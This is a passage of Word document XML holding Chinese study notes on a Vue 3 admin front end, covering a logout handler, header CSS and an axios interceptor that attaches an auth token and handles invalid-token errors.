        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除当前用户状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD2A4A2" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    store.dispatch("logout")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02D5CF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D142E3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到登录页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FFCC63" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    router.push("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450EE93" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDD3392" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示退出登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641074C1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BEEBF" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2FF08" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EDA74" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF7A6B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D383276" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF4BFAC" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69E50E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78850D12" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center bg-indigo-700 text-light-200 fixed top-0 left-0 right-0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23535437" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED29261" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F466941" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B40D088" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.logo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CDD3B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 250px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070FE286" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center text-xl font-thin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771EA1A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E9C7F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F367EB0" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.icon-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A71BE1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5369E" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 42px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D27DC" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F024F" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32284CF1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C94E3" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1688B26B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.icon-btn:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15316035" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply bg-indigo-200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2244809C" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906B2B8" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510312B6" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header .dropdown {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1B019" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center mx-5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDA312" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 200px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65CA46" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DA603" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA69EF9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2FC59" w14:textId="592DA726" w:rsidR="00D43B70" w:rsidRPr="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38066D0D" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699254B3" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FF39CA" w14:textId="311A60E9" w:rsidR="000B2487" w:rsidRDefault="002B2A37" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制登录</w:t>
      </w:r>
      <w:r w:rsidR="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：去</w:t>
      </w:r>
      <w:r w:rsidR="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008D3F92">
        <w:t>xios.js</w:t>
      </w:r>
      <w:r w:rsidR="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改全局响应器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0AB46" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121734F4" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import axios from "axios"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F571CBB" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { ElNotification } from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5EC3A" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { toast } from '~/composables/util'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474530C" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { useCookies } from '@vueuse/integrations/useCookies'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2D572" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE320F9" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  getToken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3674D0E4" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} from '~/composables/auth'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E8BE7" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import store from './store'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9E4ED" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136020EE" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const service = axios.create({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC1337" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  baseURL: "/api",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA0D22" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A369742" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B55AADF" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加请求拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20891C6F" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>service.interceptors.request.use(function (config) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471485B2" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在发送请求之前做些什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959E06B" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08035226" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>往</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头自动添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273373A" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A611F" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  // const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CACD2" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  // const token = cookie.get('admin-token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EB481" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const token = getToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F85E5" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C704B2D" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    config.headers['token'] = token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00E4E6" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A2671" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3981A38E" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return config;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C44A5" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}, function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D924168" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对请求错误做些什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE44051" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45846846" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A12139" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57842860" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加响应拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DCC36" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>service.interceptors.response.use(function (response) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FE539" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对响应数据做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E978A0" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return response.data.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC55F74" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}, </w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBAA00" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对响应错误做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE59911" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  const msg = error.response.data.msg || "</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请求失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
